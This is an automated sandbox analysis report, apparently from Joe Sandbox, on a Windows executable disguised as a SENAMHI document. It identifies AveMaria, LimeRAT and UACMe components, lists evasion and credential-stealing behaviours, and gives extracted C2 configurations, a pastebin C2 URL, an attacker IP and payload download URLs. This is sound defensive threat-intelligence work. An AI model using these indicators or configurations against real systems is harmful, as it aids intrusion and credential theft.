Windows Analysis Report
DocumentoSENAMHI20222103.exe

Overview

General Information

Sample Name: DocumentoSENAMHI20222103.exe
Analysis ID: 593268
MD5: 81ba3d2de48272d692c4e6604e6b1db9
SHA1: 921e7008881d5e0e9a788ee310ddef60b343c647
SHA256: eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
Infos:

Detection

AveMaria LimeRAT UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected LimeRAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Sigma detected: Suspicious Add Scheduled Task Parent
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: http://172.111.242.20/Chrome.exeTTC: Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exer Avira URL Cloud: Label: malware
Source: 172.111.242.20 Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exelr Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exen Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: 18.2.chrome.exe.760000.0.unpack Malware Configuration Extractor: LimeRAT {"C2 url": "https://pastebin.com/raw/03PEm7js", "AES Key": "150797", "ENDOF": "|'N'|", "Seprator": "|'L'|", "Install File": "True", "Install Dir": "temp", "Version": "v4.0"}
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack Malware Configuration Extractor: AveMaria {"C2 url": "172.111.242.20", "port": 2031}
Source: DocumentoSENAMHI20222103.exe ReversingLabs: Detection: 16%
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\IconLib.dll Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Temp\IconLib.dll ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\chrome.exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Joe Sandbox ML: detected
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack Avira: Label: TR/Redcap.ghjpt
Source: 1.0.DocumentoSENAMHI20222103.exe.bd0000.0.unpack Avira: Label: ADWARE/Adware.Gen8
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack Avira: Label: TR/Patched.Ren.Gen3
Source: 1.2.DocumentoSENAMHI20222103.exe.bd0000.0.unpack Avira: Label: ADWARE/Adware.Gen8

Exploits

Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DocumentoSENAMHI20222103.exe PID: 6576, type: MEMORYSTR
Source: unknown HTTPS traffic detected: 104.23.98.190:443 -> 192.168.11.20:49764 version: TLS 1.0
Source: DocumentoSENAMHI20222103.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DocumentoSENAMHI20222103.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDA22B FindFirstFileExW, 1_2_00BDA22B

Networking

Source: unknown DNS query: name: pastebin.com
Source: Malware configuration extractor URLs: https://pastebin.com/raw/03PEm7js
Source: Malware configuration extractor URLs: 172.111.242.20
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic HTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Mar 2022 13:44:48 GMTServer: Apache/2.2.8 (Win32)Last-Modified: Thu, 10 Mar 2022 10:08:40 GMTETag: "300000003618c-7200-5d9da65f94fe9"Accept-Ranges: bytesContent-Length: 29184Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: unknown HTTPS traffic detected: 104.23.98.190:443 -> 192.168.11.20:49764 version: TLS 1.0
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: Joe Sandbox View IP Address: 104.23.98.190 104.23.98.190
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.111.242.20/Chrome.exe
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502359719.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80684755991.00000000011D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.111.242.20/Chrome.exeTTC:
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.111.242.20/Chrome.exelr
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502024723.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.111.242.20/Chrome.exen
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502024723.00000000011B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.111.242.20/Chrome.exer
